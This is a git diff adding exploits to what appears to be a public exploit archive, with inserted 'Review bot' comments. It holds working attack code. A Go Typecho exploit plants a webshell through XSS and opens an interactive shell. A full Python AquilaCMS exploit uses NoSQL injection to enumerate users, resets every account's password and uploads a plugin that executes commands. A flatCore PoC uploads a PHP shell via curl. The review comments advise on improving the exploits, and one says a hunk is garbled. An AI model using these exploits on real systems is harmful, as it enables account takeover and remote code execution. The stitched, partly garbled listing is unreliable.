Edit URL:", editUrl) + + password := generateRandomBytes() + fmt.Println("[+] Generated password to access the webshell: ", password) + + fmt.Println("[*] Generating JavaScript code to inject webshell...") + jsCode := getJsCode(password) + payload := generatePayload(jsCode) + + fmt.Println("[*] Creating malicious post...") + postUrl := createPost(editUrl, cookies, payload) + if postUrl == "" || postUrl == "/" { + fmt.Println("[-] Could not create malicious post, exiting...") + return + } + + previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1) + fmt.Println("[+] Malicious post created successfully!") + fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl) + + fmt.Println("[*] Waiting for the admin to visit the preview URL...") + for !checkInjected(targetUrl) { + time.Sleep(1 * time.Second) + } + + fmt.Println("[+] Webshell injected 
successfully!") + fmt.Println("[+] Enjoy your shell ;)\n") + interactiveShell(targetUrl, password) +} \ No newline at end of file diff --git a/exploits/php/webapps/52164.py b/exploits/php/webapps/52164.py new file mode 100755 index 000000000..4ce3ceec5 --- /dev/null +++ b/exploits/php/webapps/52164.py 
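Review bot: `readInput` returns `""` once stdin reaches EOF, and `interactiveShell` then loops forever posting an empty `action`, so a piped or closed stdin becomes an unbounded request loop; returning from `interactiveShell` when `readInput()` yields `""` (and surfacing `scanner.Err()`) bounds it. The literal `postTitle = "Reflected XSS PoC"` contradicts the file's own title and CVE (stored XSS, CVE-2024-35540). The middle of this hunk is garbled in this rendering — `getJsCode`, `generatePayload` and `generateRandomBytes` are called from `main` but only fragments of their definitions survive — so the listing should be verified against the repository before being cited.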
@@ -0,0 +1,197 @@
+# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) (Unauthenticated)
+# Date: 2024-10-25
+# Exploit Author: Eui Chul Chung
+# Vendor Homepage: https://www.aquila-cms.com/
+# Software Link: https://github.com/AquilaCMS/AquilaCMS
+# Version: v1.409.20
+# CVE: CVE-2024-48572, CVE-2024-48573
+
+
+import io
+import json
+import uuid
+import string
+import zipfile
+import argparse
+import requests
+import textwrap
+
+
+def unescape_special_characters(email):
+ return (
+ email.replace("[$]", "$")
+ .replace("[*]", "*")
+ .replace("[+]", "+")
+ .replace("[-]", "-")
+ .replace("[.]", ".")
+ .replace("[?]", "?")
+ .replace(r"[\^]", "^")
+ .replace("[|]", "|")
+ )
+
+
+def get_user_emails():
+ valid_characters = list(
+ string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
+ ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
+
+ emails_found = []
+
+ next_emails = ["^"]
+ while next_emails:
+ prev_emails = next_emails
+ next_emails = []
+
+ for email in prev_emails:
+ found = False
+ for ch in valid_characters:
+ data = {"email": f"{email + ch}.*"}
+ res = requests.put(f"{args.url}/api/v2/user", json=data)
+
+ if json.loads(res.text)["code"] == "UserAlreadyExist":
+ next_emails.append(email + ch)
+ found = True
+
+ if not found:
+ emails_found.append(email[1:])
+ print(f"[+] {unescape_special_characters(email[1:])}")
+
+ return emails_found
+
+
+def reset_password(email):
+ data = {"email": email}
+ requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
+
+ data = {"token": {"$ne": None}, "password": args.password}
+ requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
+
+ print(f"[+] {unescape_special_characters(email)} : {args.password}")
+
+
+def get_admin_auth_token(emails):
+ for email in emails:
+ data = {"username": email, "password": args.password}
+ res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
+
+ if res.status_code == 200:
+ print(f"[+] Administrator account : {unescape_special_characters(email)}")
+ return json.loads(res.text)["data"]
+
+ return None
+
+
+def create_plugin(plugin_name):
+ payload = textwrap.dedent(
+ f"""
+ const {{ exec }} = require("child_process");
+
+ /**
+ * This function is called when the plugin is desactivated or when we delete it
+ */
+ module.exports = async function (resolve, reject) {{
+ try {{
+ exec("{args.command}");
+ return resolve();
+ }} catch (error) {{}}
+ }};
+ """
+ ).strip()
+
+ plugin = io.BytesIO()
+ with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
+ zip_file.writestr(
+ f"{plugin_name}/package.json",
+ io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
+ )
+ zip_file.writestr(
+ f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
+ )
+ zip_file.writestr(
+ f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
+ )
+
+ plugin.seek(0)
+ return plugin
+
+
+def rce(emails):
+ auth_token = get_admin_auth_token(emails)
+ if auth_token is None:
+ print("[-] Administrator account not found")
+ return
+
+ print("[+] Create malicious plugin")
+ plugin_name = uuid.uuid4().hex
+ plugin = create_plugin(plugin_name)
+
+ print("[+] Upload plugin")
+ headers = {"Authorization": auth_token}
+ files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
+ requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
+
+ print("[+] Find uploaded plugin")
+ headers = {"Authorization": auth_token}
+ data = {"PostBody": {"limit": 0}}
+ res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
+
+ plugin_id = None
+ for data in json.loads(res.text)["datas"]:
+ if data["name"] == plugin_name:
+ plugin_id = data["_id"]
+ print(f"[+] Plugin ID : {plugin_id}")
+ break
+
+ if plugin_id is None:
+ print("[-] Plugin not found")
+ return
+
+ print("[+] Deactivate plugin")
+ headers = {"Authorization": auth_token}
+ data = {"idModule": plugin_id, "active": False}
+ res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
+
+ if res.status_code == 200:
+ print("[+] Command execution succeeded")
+ else:
+ print("[-] Command execution failed")
+
+
+def main():
+ print("[*] Retrieve email addresses")
+ emails = get_user_emails()
+
+ print("\n[*] Reset password")
+ for email in emails:
+ reset_password(email)
+
+ print("\n[*] Perform remote code execution")
+ rce(emails)
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument(
+ "-u",
+ dest="url",
+ help="Site URL (e.g. www.aquila-cms.com)",
+ type=str,
+ required=True,
+ )
+ parser.add_argument(
+ "-p",
+ dest="password",
+ help="Password to use for password reset (e.g. HaXX0r3d!)",
+ type=str,
+ default="HaXX0r3d!",
+ )
+ parser.add_argument(
+ "-c",
+ dest="command",
+ help="Command to execute (e.g. touch /tmp/pwned)",
+ type=str,
+ default="touch /tmp/pwned",
+ )
+ args = parser.parse_args()
+
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/52165.txt b/exploits/php/webapps/52165.txt
new file mode 100644
index 000000000..719e094e0
--- /dev/null
+++ b/exploits/php/webapps/52165.txt
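Review bot: Nothing in the header documents that `main()` calls `reset_password(email)` for every address returned by `get_user_emails()`, so one run overwrites the credentials of every enumerated account rather than only the administrator's; a header line such as `# NOTE: resets the password of EVERY enumerated account to -p before the admin login is attempted (destructive; a burst of reset calls is also a clear forensic indicator on the target)` would make that visible before anyone runs it. The module-level `args` is read inside `get_user_emails`, `reset_password`, `get_admin_auth_token`, `create_plugin` and `rce` but is only bound under `if __name__ == "__main__"`, so importing the module for reuse or testing fails at the first call; passing `url`, `password` and `command` as parameters (or a single settings object) is the usual fix. The `-p` and `-c` defaults (`HaXX0r3d!`, `touch /tmp/pwned`) are likewise undocumented in the header and would be worth listing next to the CVE line, since they are the values written into the target's database and executed there.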
@@ -0,0 +1,78 @@
+# Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
+# Date: [2024-10-26]
+# Exploit Author: [CodeSecLab]
+# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS]
+# Software Link: [https://github.com/flatCore/flatCore-CMS]
+# Version: [1.5.5]
+# Tested on: [Ubuntu Windows]
+# CVE : [CVE-2019-10652]
+PoC:
+1)
+1. Access the flatCore Admin Panel
+URL: http://flatcore/acp/acp.php
+Log in with valid administrative credentials.
+2. Upload a Malicious PHP File
+Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
+3. Intercept and Modify the Upload Request
+Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
+
+POST /acp/core/files.upload-script.php HTTP/1.1
+Host: flatcore
+Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
+Content-Length:
+Cookie: PHPSESSID=
+
+-----------------------------735323031399963166993862150
+Content-Disposition: form-data; name="file"; filename="exploit.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------735323031399963166993862150
+Content-Disposition: form-data; name="upload_destination"
+
+../content/files
+-----------------------------735323031399963166993862150
+Content-Disposition: form-data; name="csrf_token"
+
+
+-----------------------------735323031399963166993862150
+Note: Replace and with values from your authenticated session.
+4. Verification
+After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
+Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
+
+PoC
+2)
+# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
+# Target URL: http://flatcore/
+# The attacker must be authenticated as an administrator to exploit this vulnerability
+
+# Step 1: Log in as an administrator and obtain the CSRF token
+# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
+
+# Step 2: Upload a malicious PHP file using the file upload feature
+
+# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
+echo "" > shell.php
+
+# Upload the PHP file using cURL
+curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
+ -H "Content-Type: multipart/form-data" \
+ -F "file=@shell.php" \
+ -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
+ -F "upload_destination=../content/files" \
+ -F "file_mode=overwrite" \
+ -b "PHPSESSID=YOUR_SESSION_ID_HERE"
+
+# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
+
+# Step 3: Access the uploaded malicious PHP file
+echo "Visit the following URL to execute the uploaded PHP file:"
+echo "http://flatcore/content/files/shell.php"
+
+This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
+[Replace Your Domain Name]
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 98e176ee0..0df3b6e22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10397,6 +10397,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,,
 42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
+52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-10,0,CVE-2024-33896,,,,,
 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@@ -11078,6 +11079,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17068,exploits/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",remote,multiple,,2011-03-29,2011-03-29,0,,,,,,
 25191,exploits/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",remote,multiple,,2005-03-07,2013-05-06,1,,,,,,https://www.securityfocus.com/bid/12733/info
 24981,exploits/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/11976/info
+52158,exploits/multiple/remote/52158.py,"K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)",2025-04-10,"M. Akil Gündoğan",remote,multiple,,2025-04-10,2025-04-10,0,CVE-2024-36424,,,,,
 11817,exploits/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,remote,multiple,,2010-03-19,,1,,,,,,
 24414,exploits/multiple/remote/24414.txt,"Keene Digital Media Server 1.0.2 - Directory Traversal",2004-08-26,"GulfTech Security",remote,multiple,,2004-08-26,2018-01-05,1,"BID: 11057;GTSA-00044",,,,,http://gulftech.org/advisories/Digital%20Media%20Server%20Arbitrary%20File%20Access/44
 20181,exploits/multiple/remote/20181.txt,"Kerberos 4 4.0/5 5.0 - KDC Spoofing",2000-08-28,"Dug Song",remote,multiple,,2000-08-28,2012-08-05,1,OSVDB-84635,,,,,https://www.securityfocus.com/bid/1616/info
@@ -11794,6 +11796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50601,exploits/multiple/webapps/50601.txt,"Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration",2021-12-16,"Daniel Morales",webapps,multiple,,2021-12-16,2021-12-16,0,CVE-2021-44848,,,,,
 11403,exploits/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - Cross-Site Scripting / Source Code Disclosure",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-62460;CVE-2010-0642;OSVDB-62459;CVE-2010-0641,,,,,
 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,,2018-03-21,2019-07-25,0,CVE-2018-0114,,,,,https://github.com/zi0Black/POC-CVE-2018-0114/tree/d3bddb421726a9eddbabfd6a1ca58ff4abca93af
+52155,exploits/multiple/webapps/52155.py,"Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover",2025-04-10,"Mohammed Adel",webapps,multiple,,2025-04-10,2025-04-10,0,CVE-2024-20419,,,,,
 37816,exploits/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",webapps,multiple,,2015-08-18,2015-08-18,0,CVE-2014-8008;CVE-2014-6271;OSVDB-126132;OSVDB-126131;OSVDB-117422,,,,,http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
 48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple,,2020-10-30,2020-10-30,0,,,,,,
 47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,,2020-01-16,2020-01-16,0,CVE-2019-19781,,,,,
@@ -14228,6 +14231,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10816,exploits/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,webapps,php,,2009-12-29,,0,,,,,,
 12567,exploits/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,webapps,php,,2010-05-10,,0,,,,,,
 8432,exploits/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,webapps,php,,2009-04-13,,1,OSVDB-53691;CVE-2009-1317;OSVDB-53690,,,,,http://crackfor.me/bugtraq/aquacms.v1.1.txt
+52164,exploits/php/webapps/52164.py,"AquilaCMS 1.409.20 - Remote Command Execution (RCE)",2025-04-10,"Eui Chul Chung",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-48573,,,,,
 2931,exploits/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,webapps,php,,2006-12-13,,1,OSVDB-57302;CVE-2006-6590,,,,,
 38015,exploits/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",webapps,php,,2012-11-08,2017-10-20,1,CVE-2012-2437;OSVDB-87922,,,,,https://www.securityfocus.com/bid/56465/info
 27642,exploits/php/webapps/27642.txt,"AR-Blog 5.2 - 'print.php' Cross-Site Scripting",2006-04-14,ALMOKANN3,webapps,php,,2006-04-14,2013-08-17,1,CVE-2006-1893;OSVDB-24863,,,,,https://www.securityfocus.com/bid/17522/info
@@ -15666,6 +15670,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38339,exploits/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,webapps,php,80,2015-09-28,2015-09-28,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
 23362,exploits/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,webapps,php,,2012-12-13,2012-12-13,0,CVE-2012-5967;OSVDB-88430,,,,,
 11979,exploits/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",webapps,php,,2010-03-30,,1,OSVDB-63347;CVE-2010-1301,,,,,
+52156,exploits/php/webapps/52156.py,"Centron 19.04 - Remote Code Execution (RCE)",2025-04-10,"Starry Sky",webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-13024,,,,,
 38074,exploits/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",webapps,php,80,2015-09-02,2015-09-02,0,CVE-2015-6545;OSVDB-126097,,,,http://www.exploit-db.comcerb-7.0.3.tar.gz,https://www.htbridge.com/advisory/HTB23269
 39526,exploits/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,webapps,php,80,2016-03-07,2016-03-10,1,,,,http://www.exploit-db.com/screenshots/idlt40000/kali-20-clean-2016-03-10-19-35-06.png,http://www.exploit-db.comcerb5-5_4_4.zip,
 25803,exploits/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",webapps,php,,2005-06-08,2013-05-29,1,,,,,,https://www.securityfocus.com/bid/13897/info
@@ -16195,6 +16200,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80,2018-05-02,2018-05-02,0,CVE-2018-9302,"Server-Side Request Forgery (SSRF)",,,http://www.exploit-db.comcockpit-0.5.5.tar.gz,
 49390,exploits/php/webapps/49390.txt,"Cockpit CMS 0.6.1 - Remote Code Execution",2021-01-07,"Rafael Resende",webapps,php,,2021-01-07,2021-01-07,0,,,,,,
 3251,exploits/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",webapps,php,,2007-02-01,,1,OSVDB-33095;CVE-2007-0757,,,,,
+52159,exploits/php/webapps/52159.txt,"CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)",2025-04-10,"Raj Nandi",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-7815,,,,,
 3599,exploits/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",webapps,php,,2007-03-27,,1,OSVDB-35423;CVE-2007-1839;OSVDB-35422,,,,,
 3711,exploits/php/webapps/3711.html,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",webapps,php,,2007-04-10,2016-11-14,1,OSVDB-34831;CVE-2007-1996,,,,,
 41550,exploits/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,,2017-03-08,2017-03-08,0,,,,,,
@@ -18583,6 +18589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",webapps,php,,2011-04-01,2011-04-01,1,OSVDB-71472,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_feng_office.html
 35041,exploits/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2014-10-23,0,,,,,,
 35042,exploits/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross-Site Scripting",2014-10-23,"AutoSec Tools",webapps,php,,2014-10-23,2016-11-12,0,,,,,,https://www.securityfocus.com/bid/47049/info
+52154,exploits/php/webapps/52154.NA,"Feng Office 3.11.1.2 - SQL Injection",2025-04-10,"Andrey Stoykov",webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-6039,,,,,
 46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,,2019-02-28,2019-03-08,0,CVE-2019-9623,,,,,
 35914,exploits/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",webapps,php,80,2015-01-26,2015-01-26,1,OSVDB-117806;OSVDB-117612;OSVDB-117533;OSVDB-117532;CVE-2015-1374;CVE-2015-1373;CVE-2015-1372;OSVDB-117531;CVE-2015-1371;OSVDB-117530,,,,,
 10552,exploits/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,webapps,php,,2009-12-18,,0,,,,,http://www.exploit-db.comfestos_2_2_1.tar.gz,
@@ -18683,6 +18690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,,
 8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,,
 1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,,
+52165,exploits/php/webapps/52165.txt,"flatCore 1.5.5 - Arbitrary File Upload",2025-04-10,CodeSecLab,webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-10652,,,,,
 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz,
 51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
 11515,exploits/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,,,,,http://www.exploit-db.com269_flatfile_login.zip,
@@ -25803,6 +25811,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,UNICORD,webapps,php,,2022-06-14,2022-06-14,0,CVE-2020-5844,,,,,
 48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,,2020-02-13,2020-02-13,0,CVE-2020-8947,,,,,
 48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php,,2020-07-26,2020-07-26,0,CVE-2020-11749,,,,,
+52157,exploits/php/webapps/52157.py,"PandoraFMS 7.0NG.772 - SQL Injection",2025-04-10,"Osama Yousef",webapps,php,,2025-04-10,2025-04-10,0,CVE-2023-44088,,,,,
 48700,exploits/php/webapps/48700.txt,"PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting",2020-07-26,"Emre ÖVÜNÇ",webapps,php,,2020-07-26,2020-12-07,0,,,,,,
 25111,exploits/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,webapps,php,,2005-02-16,2013-05-01,1,,,,,,https://www.securityfocus.com/bid/12576/info
 25145,exploits/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,webapps,php,,2005-02-21,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12611/info
@@ -31464,6 +31473,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29704,exploits/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33858,,,,,https://www.securityfocus.com/bid/22799/info
 29705,exploits/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1291;OSVDB-33859,,,,,https://www.securityfocus.com/bid/22799/info
 29703,exploits/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,webapps,php,,2007-02-26,2013-11-19,1,CVE-2007-1289;OSVDB-35817,,,,,https://www.securityfocus.com/bid/22799/info
+52161,exploits/php/webapps/52161.go,"Typecho 1.3.0 - Race Condition",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35539,,,,,
+52162,exploits/php/webapps/52162.go,"Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)",2025-04-10,cyberaz0r,webapps,php,,2025-04-10,2025-04-10,0,CVE-2024-35540,,,,,
 49128,exploits/php/webapps/49128.txt,"TypeSetter 5.1 - CSRF (Change admin e-mail)",2020-12-01,"Alperen Ergel",webapps,php,,2020-12-01,2020-12-01,0,,,,,,
 44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php,,2018-02-13,2018-02-13,0,CVE-2018-6889,,,,,
 48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php,,2020-10-01,2020-10-01,0,,,,,,